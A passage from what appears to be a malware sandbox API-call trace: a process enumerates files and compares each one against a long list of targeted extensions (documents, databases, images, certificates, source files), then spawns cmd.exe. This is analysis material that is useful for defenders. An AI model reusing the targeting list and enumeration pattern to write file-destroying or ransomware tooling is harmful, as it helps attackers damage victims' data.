lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".ai7", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".ai8", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".anim", lpString2="d.png") returned -1 [0039.677] lstrcmpiW (lpString1=".arw", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".as", lpString2="png") returned -1 [0039.677] lstrcmpiW (lpString1=".asa", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".asc", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".ascx", lpString2="d.png") returned -1 [0039.677] lstrcmpiW (lpString1=".asm", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".asmx", lpString2="d.png") returned -1 [0039.677] lstrcmpiW (lpString1=".asp", lpString2=".png") returned -1 [0039.677] lstrcmpiW (lpString1=".aspx", lpString2="d.png") returned -1 [0039.678] lstrcmpiW (lpString1=".asr", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".asx", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".avi", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".avs", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".backup", lpString2="und.png") returned -1 [0039.678] lstrcmpiW (lpString1=".bak", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".bay", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".bd", lpString2="png") returned -1 [0039.678] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".bmp", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".c", lpString2="ng") returned -1 [0039.678] lstrcmpiW (lpString1=".cdr", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".cer", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".cf", lpString2="png") returned -1 [0039.678] lstrcmpiW (lpString1=".cfc", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".cfm", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".cfml", lpString2="d.png") returned -1 [0039.678] lstrcmpiW (lpString1=".cfu", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".chm", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".cin", lpString2=".png") returned -1 [0039.678] lstrcmpiW (lpString1=".class", lpString2="nd.png") returned -1 [0039.679] lstrcmpiW (lpString1=".clx", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".config", lpString2="und.png") returned -1 [0039.679] lstrcmpiW (lpString1=".cpp", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".cr2", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".crt", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".crw", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".cs", lpString2="png") returned -1 [0039.679] lstrcmpiW (lpString1=".css", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".csv", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".cub", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".dae", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".dat", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".db", lpString2="png") returned -1 [0039.679] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0039.679] lstrcmpiW (lpString1=".dbx", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dc3", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dcm", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dcr", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".der", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dib", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dic", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dif", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".divx", lpString2="d.png") returned -1 [0039.680] lstrcmpiW (lpString1=".djvu", lpString2="d.png") returned -1 [0039.680] lstrcmpiW (lpString1=".dng", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".docm", lpString2="d.png") returned -1 [0039.680] lstrcmpiW (lpString1=".docx", lpString2="d.png") returned -1 [0039.680] lstrcmpiW (lpString1=".dot", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dotm", lpString2="d.png") returned -1 [0039.680] lstrcmpiW (lpString1=".dotx", lpString2="d.png") returned -1 [0039.680] lstrcmpiW (lpString1=".dpx", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dqy", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dsn", lpString2=".png") returned -1 [0039.680] lstrcmpiW (lpString1=".dt", lpString2="png") returned -1 [0039.680] lstrcmpiW (lpString1=".dtd", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".dwg", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".dwt", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".dx", lpString2="png") returned -1 [0039.681] lstrcmpiW (lpString1=".dxf", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".edml", lpString2="d.png") returned -1 [0039.681] lstrcmpiW (lpString1=".efd", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".elf", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".emf", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".emz", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".epf", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".eps", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".epsf", lpString2="d.png") returned -1 [0039.681] lstrcmpiW (lpString1=".epsp", lpString2="d.png") returned -1 [0039.681] lstrcmpiW (lpString1=".erf", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".exr", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".f4v", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".fido", lpString2="d.png") returned -1 [0039.681] lstrcmpiW (lpString1=".flm", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".flv", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".fxg", lpString2=".png") returned -1 [0039.681] lstrcmpiW (lpString1=".geo", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".gif", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".grs", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".gz", lpString2="png") returned -1 [0039.682] lstrcmpiW (lpString1=".h", lpString2="ng") returned -1 [0039.682] lstrcmpiW (lpString1=".hdr", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".hpp", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".htc", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".htm", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".html", lpString2="d.png") returned -1 [0039.682] lstrcmpiW (lpString1=".icb", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".iff", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".inc", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".indd", lpString2="d.png") returned -1 [0039.682] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".iqy", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".j2c", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".j2k", lpString2=".png") returned -1 [0039.682] lstrcmpiW (lpString1=".java", lpString2="d.png") returned -1 [0039.682] lstrcmpiW (lpString1=".jp2", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".jpc", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".jpe", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".jpeg", lpString2="d.png") returned -1 [0039.683] lstrcmpiW (lpString1=".jpf", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".jpx", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".js", lpString2="png") returned -1 [0039.683] lstrcmpiW (lpString1=".jsf", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".json", lpString2="d.png") returned -1 [0039.683] lstrcmpiW (lpString1=".jsp", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".kdc", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".kmz", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".kwm", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".lasso", lpString2="nd.png") returned -1 [0039.683] lstrcmpiW (lpString1=".lbi", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".lgf", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".lgp", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".log", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".m1v", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".m4a", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".m4v", lpString2=".png") returned -1 [0039.683] lstrcmpiW (lpString1=".max", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".md", lpString2="png") returned -1 [0039.684] lstrcmpiW (lpString1=".mda", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mdb", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mde", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mdw", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mef", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mft", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mfw", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mht", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mhtml", lpString2="nd.png") returned -1 [0039.684] lstrcmpiW (lpString1=".mka", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mkidx", lpString2="nd.png") returned -1 [0039.684] lstrcmpiW (lpString1=".mkv", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mos", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mov", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mp4", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mpeg", lpString2="d.png") returned -1 [0039.684] lstrcmpiW (lpString1=".mpg", lpString2=".png") returned -1 [0039.684] lstrcmpiW (lpString1=".mpv", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".mrw", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".msg", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".mxl", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".myi", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".nef", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".nrw", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".obj", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".odb", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".odc", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".odm", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".odp", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".ods", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".oft", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".one", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".onepkg", lpString2="und.png") returned -1 [0039.685] lstrcmpiW (lpString1=".onetoc2", lpString2="ound.png") returned -1 [0039.685] lstrcmpiW (lpString1=".opt", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".oqy", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".orf", lpString2=".png") returned -1 [0039.685] lstrcmpiW (lpString1=".p12", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".p7b", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".p7c", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pam", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pbm", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pct", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pcx", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pdd", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pdp", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pef", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pem", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pff", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pfm", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pfx", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".pgm", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".php", lpString2=".png") returned -1 [0039.686] lstrcmpiW (lpString1=".php3", lpString2="d.png") returned -1 [0039.686] lstrcmpiW (lpString1=".php4", lpString2="d.png") returned -1 [0039.686] lstrcmpiW (lpString1=".php5", lpString2="d.png") returned -1 [0039.686] lstrcmpiW (lpString1=".phtml", lpString2="nd.png") returned -1 [0039.687] lstrcmpiW (lpString1=".pict", lpString2="d.png") returned -1 [0039.687] lstrcmpiW (lpString1=".pl", lpString2="png") returned -1 [0039.687] lstrcmpiW (lpString1=".pls", lpString2=".png") returned -1 [0039.687] lstrcmpiW (lpString1=".pm", lpString2="png") returned -1 [0039.687] lstrcmpiW (lpString1=".png", lpString2=".png") returned 0 [0039.687] FindNextFileW (in: hFindFile=0x3942be8, lpFindFileData=0x351f094 | out: lpFindFileData=0x351f094*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x72858c15, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x72858c15, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x49f4d6d7, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8a3, dwReserved0=0x0, dwReserved1=0x0, cFileName="16_9-frame-highlight.png", cAlternateFileName="")) returned 1 [0039.687] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0039.687] lstrcmpiW (lpString1=".3ds", lpString2=".png") returned -1 [0039.687] lstrcmpiW (lpString1=".3fr", lpString2=".png") returned -1 [0039.687] lstrcmpiW (lpString1=".3g2", lpString2=".png") returned -1 [0039.687] lstrcmpiW (lpString1=".3gp", lpString2=".png") returned -1 [0039.687] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0039.687] lstrcmpiW (lpString1=".accda", lpString2="ht.png") returned -1 [0039.687] lstrcmpiW (lpString1=".accdb", lpString2="ht.png") returned -1 [0039.687] lstrcmpiW (lpString1=".accdc", lpString2="ht.png") returned -1 [0039.687] lstrcmpiW (lpString1=".accde", lpString2="ht.png") returned -1 [0039.687] lstrcmpiW (lpString1=".accdt", lpString2="ht.png") returned -1 [0039.687] lstrcmpiW (lpString1=".accdw", lpString2="ht.png") returned -1 [0039.688] lstrcmpiW (lpString1=".adb", lpString2=".png") returned -1 [0039.688] lstrcmpiW (lpString1=".adp", lpString2=".png") returned -1 [0039.688] lstrcmpiW (lpString1=".ai", lpString2="png") returned -1 [0039.689] lstrcmpiW (lpString1=".ai3", lpString2=".png") returned -1 [0039.689] lstrcmpiW (lpString1=".ai4", lpString2=".png") returned -1 [0039.689] lstrcmpiW (lpString1=".ai5", lpString2=".png") returned -1 [0039.689] lstrcmpiW (lpString1=".ai6", lpString2=".png") returned -1 [0039.689] lstrcmpiW (lpString1=".ai7", lpString2=".png") returned -1 [0039.689] lstrcmpiW (lpString1=".ai8", lpString2=".png") returned -1 [0039.689] lstrcmpiW (lpString1=".anim", lpString2="t.png") returned -1 [0039.689] lstrcmpiW (lpString1=".arw", lpString2=".png") returned -1 [0039.689] lstrcmpiW (lpString1=".as", lpString2="png") returned -1 [0039.689] lstrlenW (lpString=".asa") returned 4 [0039.689] lstrcmpiW (lpString1=".asa", lpString2=".png") returned -1 [0039.689] lstrlenW (lpString=".asc") returned 4 [0039.689] lstrcmpiW (lpString1=".asc", lpString2=".png") returned -1 [0039.689] lstrlenW (lpString=".ascx") returned 5 [0039.689] lstrcmpiW (lpString1=".ascx", lpString2="t.png") returned -1 [0039.689] lstrlenW (lpString=".asm") returned 4 [0039.689] lstrcmpiW (lpString1=".asm", lpString2=".png") returned -1 [0039.689] lstrlenW (lpString=".asmx") returned 5 [0049.726] FindNextFileW (in: hFindFile=0x3942ca8, lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6c1f0570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6c1f0570, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x351f470, cFileName="..", cAlternateFileName="")) returned 1 [0049.726] FindNextFileW (in: hFindFile=0x3942ca8, lpFindFileData=0x351f310 | out: lpFindFileData=0x351f310*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc5fd1300, ftCreationTime.dwHighDateTime=0x1c8e623, ftLastAccessTime.dwLowDateTime=0x6c1f0570, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc5fd1300, ftLastWriteTime.dwHighDateTime=0x1c8e623, nFileSizeHigh=0x0, nFileSizeLow=0x1fa, dwReserved0=0x0, dwReserved1=0x351f470, cFileName="SendToOneNote-PipelineConfig.xml", cAlternateFileName="SENDTO~1.XML")) returned 1 [0049.726] lstrlenW (lpString="SendToOneNote-PipelineConfig.xml") returned 32 [0049.726] lstrlenW (lpString=".1cd") returned 4 Thread: id = 23 os_tid = 0xa34 Thread: id = 26 os_tid = 0xa44 Process: id = "2" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x4ded5000" os_pid = "0x9b4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x9a8" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\"" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "64" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0x9b8 [0034.760] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fa10 | out: lpSystemTimeAsFileTime=0x20fa10*(dwLowDateTime=0x1f9338a0, dwHighDateTime=0x1d50bf6)) [0034.760] GetCurrentProcessId () returned 0x9b4 [0034.760] GetCurrentThreadId () returned 0x9b8 [0034.760] GetTickCount () returned 0x17ecf [0034.760] QueryPerformanceCounter (in: lpPerformanceCount=0x20fa18 | out: lpPerformanceCount=0x20fa18*=15520777306) returned 1 [0034.761] GetModuleHandleW (lpModuleName=0x0) returned 0x49de0000 [0034.761] __set_app_type (_Type=0x1) [0034.761] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49e07810) returned 0x0 [0034.761] __getmainargs (in: _Argc=0x49e2a608, _Argv=0x49e2a618, _Env=0x49e2a610, _DoWildCard=0, _StartInfo=0x49e0e0f4 | out: _Argc=0x49e2a608, _Argv=0x49e2a618, _Env=0x49e2a610) returned 0 [0034.761] GetCurrentThreadId () returned 0x9b8 [0034.761] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b8) returned 0x3c [0034.762] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76e30000 [0034.762] GetProcAddress (hModule=0x76e30000, lpProcName="SetThreadUILanguage") returned 0x76e46d40 [0034.762] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0034.762] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0034.762] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f9a8 | out: phkResult=0x20f9a8*=0x0) returned 0x2 [0034.762] VirtualQuery (in: lpAddress=0x20f990, lpBuffer=0x20f910, dwLength=0x30 | out: lpBuffer=0x20f910*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0034.762] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f910, dwLength=0x30 | out: lpBuffer=0x20f910*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0034.762] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f910, dwLength=0x30 | out: lpBuffer=0x20f910*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0034.762] VirtualQuery (in: lpAddress=0x114000, lpBuffer=0x20f910, dwLength=0x30 | out: lpBuffer=0x20f910*(BaseAddress=0x114000, AllocationBase=0x110000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0034.762] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f910, dwLength=0x30 | out: lpBuffer=0x20f910*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0034.762] GetConsoleOutputCP () returned 0x1b5 [0034.762] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e1bfe0 | out: lpCPInfo=0x49e1bfe0) returned 1 [0034.763] SetConsoleCtrlHandler (HandlerRoutine=0x49e03184, Add=1) returned 1 [0034.763] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.763] SetConsoleMode (hConsoleHandle=0xf4, dwMode=0x0) returned 0 [0034.763] _get_osfhandle (_FileHandle=1) returned 0xf4 [0034.763] GetConsoleMode (in: hConsoleHandle=0xf4, lpMode=0x49e0e194 | out: lpMode=0x49e0e194) returned 0 [0034.763] _get_osfhandle (_FileHandle=0) returned 0xe8 [0034.763] GetConsoleMode (in: hConsoleHandle=0xe8, lpMode=0x49e0e198 | out: lpMode=0x49e0e198) returned 0 [0034.763] GetEnvironmentStringsW () returned 0x308a60* [0034.763] GetProcessHeap () returned 0x2f0000 [0034.763] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x3094f0 [0034.763] FreeEnvironmentStringsW (penv=0x308a60) returned 1 [0034.764] GetProcessHeap () returned 0x2f0000 [0034.764] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0x8) returned 0x3088e0 [0034.764] GetEnvironmentStringsW () returned 0x308a60* [0034.764] GetProcessHeap () returned 0x2f0000 [0034.764] RtlAllocateHeap (HeapHandle=0x2f0000, Flags=0x8, Size=0xa7c) returned 0x309f80 [0034.764] FreeEnvironmentStringsW (penv=0x308a60) returned 1 [0034.764] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e868 | out: phkResult=0x20e868*=0x44) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x0, lpData=0x20e880*=0x18, lpcbData=0x20e864*=0x1000) returned 0x2 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x4, lpData=0x20e880*=0x1, lpcbData=0x20e864*=0x4) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x0, lpData=0x20e880*=0x1, lpcbData=0x20e864*=0x1000) returned 0x2 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x4, lpData=0x20e880*=0x0, lpcbData=0x20e864*=0x4) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x4, lpData=0x20e880*=0x40, lpcbData=0x20e864*=0x4) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x4, lpData=0x20e880*=0x40, lpcbData=0x20e864*=0x4) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x0, lpData=0x20e880*=0x40, lpcbData=0x20e864*=0x1000) returned 0x2 [0034.764] RegCloseKey (hKey=0x44) returned 0x0 [0034.764] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e868 | out: phkResult=0x20e868*=0x44) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x0, lpData=0x20e880*=0x40, lpcbData=0x20e864*=0x1000) returned 0x2 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x4, lpData=0x20e880*=0x1, lpcbData=0x20e864*=0x4) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x0, lpData=0x20e880*=0x1, lpcbData=0x20e864*=0x1000) returned 0x2 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x4, lpData=0x20e880*=0x0, lpcbData=0x20e864*=0x4) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e860, lpData=0x20e880, lpcbData=0x20e864*=0x1000 | out: lpType=0x20e860*=0x4, lpData=0x20e880*=0x9, lpcbData=0x20e864*=0x4) returned 0x0 [0034.764] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, 